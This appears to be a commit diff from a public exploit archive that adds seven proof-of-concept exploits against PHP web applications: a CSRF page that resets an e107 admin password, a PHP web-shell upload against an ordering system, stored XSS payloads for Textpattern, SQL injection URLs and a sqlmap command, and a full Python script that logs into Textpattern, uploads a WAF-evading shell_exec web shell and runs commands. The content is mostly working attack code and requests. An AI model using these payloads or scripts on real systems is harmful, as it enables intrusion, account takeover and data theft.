DB: 2021-03-05

8 changes to exploits/shellcodes

e107 CMS 2.3.0 - CSRF
Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)
Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)
Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
Textpattern 4.8.3 - Remote code execution (Authenticated) (2)

exploits/php/webapps/47289.txt

@@ -4,6 +4,7 @@
 # Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
 # Version: 3.5
 # CWE : CWE-79
+# CVE: CVE-2020-23518
 
 [Description]
 

exploits/php/webapps/49614.txt

@@ -0,0 +1,70 @@
+# Exploit Title: e107 CMS 2.3.0 - CSRF
+# Date: 04/03/2021
+# Exploit Author: Tadjmen
+# Vendor Homepage: https://e107.org
+# Software Link: https://e107.org/download
+# Version: 2.3.0
+# Tested on: Windows 10
+# CVE : CVE-2021-27885
+
+CSRF vulnerability on e107 CMS
+
+## Bug Description
+Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link.
+
+## How to Reproduce
+Steps to reproduce the behavior:
+1. Create a CSRF login POC using the following code.
+
+```
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+
+<html>
+<head>
+<title>Cross Site Request Forgery (Edit Existing Admin details)</title>
+</head>
+
+<body onload="javascript:fireForms()">
+<script language="JavaScript">
+
+function fireForms()
+{
+    var count = 2;
+    var i=0;
+
+    for(i=0; i<count; i++)
+    {
+        document.forms[i].submit();
+    }
+}
+
+</script>
+
+<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>
+
+<form method="POST" name="form0" action="
+http://localhost/[path-to-e107-cms]/usersettings.php">
+
+<input type="hidden" name="loginname" value="admin"/>
+<input type="hidden" name="email" value="[email]"/>
+<input type="hidden" name="password1" value="[password]"/>
+<input type="hidden" name="password2" value="[password]"/>
+<input type="hidden" name="hideemail" value="1"/>
+<input type="hidden" name="image" value=""/>
+<input type="hidden" name="signature" value=""/>
+<input type="hidden" name="updatesettings" value="Save settings"/>
+<input type="hidden" name="_uid" value="2"/>
+
+
+
+
+</form>
+
+</body>
+</html>
+```
+
+
+2. Replace the email and password with the valid credentials.
+3. Send the link script to the victim (admin) to make them click.
+4. Login with new admin password

exploits/php/webapps/49615.txt

@@ -0,0 +1,79 @@
+# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
+# Date: 04/03/2021
+# Exploit Author: Suraj Bhosale
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
+# Version: 1.0
+# Tested on Windows 10, XAMPP
+
+
+Request:
+========
+
+POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
+Gecko/20100101 Firefox/85.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------14955282031852449676680360880
+Content-Length: 972
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/onlineordering/GPST/store/index.php
+Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir
+Upgrade-Insecure-Requests: 1
+
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="transnum"
+
+VAF-XAP
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="select1"
+
+25
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="pname"
+
+keychain
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="select2"
+
+1
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="txtDisplay"
+
+25
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="note"
+
+test
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="image"; filename="shell.php"
+Content-Type: application/octet-stream
+
+<?php echo "Shell";system($_GET['cmd']); ?>
+-----------------------------14955282031852449676680360880--
+
+Response:
+=========
+
+HTTP/1.1 200 OK
+Date: Thu, 04 Mar 2021 13:28:27 GMT
+Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
+X-Powered-By: PHP/7.3.27
+Content-Length: 55
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<meta http-equiv="refresh" content="1; url=index.php">
+
+# Uploaded Malicious File can be Found in :
+onlineordering\GPST\store\design
+
+# go to
+http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname
+which will execute hostname command.

exploits/php/webapps/49616.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)
+# Date: 2021-03-04
+# Exploit Author: Tushar Vaidya
+# Vendor Homepage: https://textpattern.com
+# Software Link: https://textpattern.com/start
+# Version: v 4.8.4
+# Tested on: Windows
+
+Steps-To-Reproduce:
+1. Login into Textpattern CMS admin panel.
+2. Now go to the *Content > C**omments > Message*.
+3. Now paste the below payload in the URL field.
+
+Ba1man”><img src=x onerror=confirm(document.location)>
+
+4. Now click on the *Save* button.
+5. Now go to the https://site.com/articles/welcome-to-your-site#comments-head
+5. The XSS will be triggered.

exploits/php/webapps/49617.txt

@@ -0,0 +1,18 @@
+# Exploit Title:  Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)
+# Date: 2021-03-04
+# Exploit Author: Tushar Vaidya
+# Vendor Homepage: https://textpattern.com
+# Software Link: https://textpattern.com/start
+# Version: v 4.9.0-dev
+# Tested on: Windows
+
+Steps-To-Reproduce:
+1. Login into Textpattern CMS admin panel.
+2. Now go to the *Content > Write > ** Excerpt*.
+3. Now paste the below payload in the URL field.
+
+Ba1man”><img src=x onerror=confirm(document.cookie)>
+
+4. Now click on the *Save* button.
+5. Now go to the *articles* page
+5. The XSS will be triggered.

exploits/php/webapps/49618.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
+# Date: 2021-03-04
+# Exploit Author: Suraj Bhosale
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
+# Version: v1.0
+# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
+# Vulnerable Parameter: id
+
+*Steps to Reproduce:*
+1) Visit
+http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
+2) Now fire up the following command into SQLMAP.
+
+CMD: sqlmap -u  http://localhost/onlineordering/GPST/admin/design.php?id=9
+<http://localhost/onlineordering/GPST/admin/design.php?id=9%27%20and%20sleep(20)%20and%20%271%27=%271>*
+--batch --dbs
+
+3) Using the above command we will get the name of all the database.

exploits/php/webapps/49619.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
+# Date: 04-03-2021
+# Exploit Author: Deepak Kumar Bharti
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
+# Software: Web Based Quiz System
+# Version: 1.0
+
+# Tested on: Windows 10 Pro
+# Union Based Sql Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe
+# in Welcome page in quiz section eid parameter affected from this vulnerability.
+# URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34
+
+POC:
+# go to url http://localhost/login.php
+# then you have to login with default creds
+# then go to quiz and execute the payload ie:--
+http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34

exploits/php/webapps/49620.py

@@ -0,0 +1,104 @@
+# Exploit Title: Textpattern 4.8.3 - Remote code execution (Authenticated) (2)
+# Date: 03/03/2021
+# Exploit Author: Ricardo Ruiz (@ricardojoserf)
+# Vendor Homepage: https://textpattern.com/
+# Software Link: https://textpattern.com/start
+# Version: Previous to 4.8.3
+# Tested on: CentOS, textpattern 4.5.7 and 4.6.0
+# Install dependencies: pip3 install beautifulsoup4 argparse requests
+# Example: python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d
+
+import sys
+import argparse
+import requests
+from bs4 import BeautifulSoup
+
+
+def get_args():
+	parser = argparse.ArgumentParser()
+	parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
+	parser.add_argument('-u', '--user', required=True, action='store', help='Username')
+	parser.add_argument('-p', '--password', required=True, action='store', help='Password')
+	parser.add_argument('-c', '--command', required=False, default="whoami", action='store', help='Command to execute')
+	parser.add_argument('-f', '--filename', required=False, default="testing.php", action='store', help='PHP File Name to upload')
+	parser.add_argument('-d', '--delete', required=False, default=False, action='store_true', help='Delete PHP file after executing command')
+	my_args = parser.parse_args()
+	return my_args
+
+
+def get_file_id(s, files_url, file_name):
+	r = s.get(files_url, verify=False)
+	soup = BeautifulSoup(r.text, "html.parser")
+	for a in soup.findAll('a'):
+		if "file_download/" in a['href']:
+			file_id_name = a['href'].split('file_download/')[1].split("/")
+			if file_id_name[1] == file_name:
+				file_id = file_id_name[0]
+				return file_id
+
+
+def login(login_url, user, password):
+	s = requests.Session()
+	s.get(login_url, verify=False)
+	data = {"p_userid":user, "p_password":password, "_txp_token":""}
+	r = s.post(login_url, data=data, verify=False)
+	if str(r.status_code) == "401":
+		print("[+] Invalid credentials")
+		sys.exit(0)
+	_txp_token = ""
+	soup = BeautifulSoup(r.text, "html.parser")
+	fields = soup.findAll('input')
+	for f in fields:
+		if (f['name'] == "_txp_token"):
+			_txp_token = f['value']
+	return s,_txp_token
+
+
+def upload(s, login_url, _txp_token, file_name):
+	php_payload = '<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n'*1000 # to avoid WAF problems
+	php_payload += '<?php $test = shell_exec($_REQUEST[\'cmd\']); echo $test; ?>'
+	s.post(login_url, files=(("MAX_FILE_SIZE", (None, "2000000")), ("event", (None, "file")), ("step", (None, "file_insert")), ("id", (None, "")), ("sort", (None, "")), ("dir", (None, "")), ("page", (None, "")), ("search_method", (None, "")), ("crit", (None, "")), ("thefile",(file_name, php_payload, 'application/octet-stream')), ("_txp_token", (None, _txp_token)),), verify=False) 
+
+
+def exec_cmd(s, cmd_url, command):
+	r = s.get(cmd_url+command, verify=False)
+	response = r.text.replace("<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n","")
+	return response
+
+
+def delete_file(s, login_url, file_id, _txp_token):
+	data = {"selected[]":file_id,"edit_method":"delete","event":"file","step":"file_multi_edit","page":"1","sort":"filename","dir":"asc","_txp_token":_txp_token}
+	s.post(login_url, data=data, verify=False)
+
+
+def main():
+	args = get_args()
+	url = args.target
+	user = args.user
+	password = args.password
+	file_name = args.filename
+	command = args.command
+	delete_after_execute = args.delete
+
+	login_url =  url + "/textpattern/index.php"
+	upload_url = url + "/textpattern/index.php"
+	cmd_url =    url + "/files/" + file_name + "?cmd="
+	files_url =  url + "/textpattern/index.php?event=file"
+
+	s,_txp_token = login(login_url, user, password)
+	print("[+] Logged in")
+	upload(s, login_url, _txp_token, file_name)
+	file_id = get_file_id(s, files_url, file_name)
+	print("[+] File uploaded with id %s"%(file_id))
+	response = exec_cmd(s, cmd_url, command)
+	print("[+] Command output \n%s"%(response))
+
+	if delete_after_execute:
+		print("[+] Deleting uploaded file %s with id %s" %(file_name, file_id))
+		delete_file(s, login_url, file_id, _txp_token)
+	else:
+		print("[+] File not deleted. Url: %s"%(url + "/files/" + file_name))
+
+
+if __name__ == "__main__":
+	main()

files_exploits.csv

@@ -43800,3 +43800,10 @@ id,file,description,date,author,type,platform,port
 49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,
 49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",2021-03-03,"Tushar Vaidya",webapps,php,
 49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",2021-03-03,"Tushar Vaidya",webapps,php,
+49614,exploits/php/webapps/49614.txt,"e107 CMS 2.3.0 - CSRF",2021-03-04,Tadjmen,webapps,php,
+49615,exploits/php/webapps/49615.txt,"Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution",2021-03-04,"Suraj Bhosale",webapps,php,
+49616,exploits/php/webapps/49616.txt,"Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,
+49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,
+49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,
+49619,exploits/php/webapps/49619.txt,"Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)",2021-03-04,"Deepak Kumar Bharti",webapps,php,
+49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,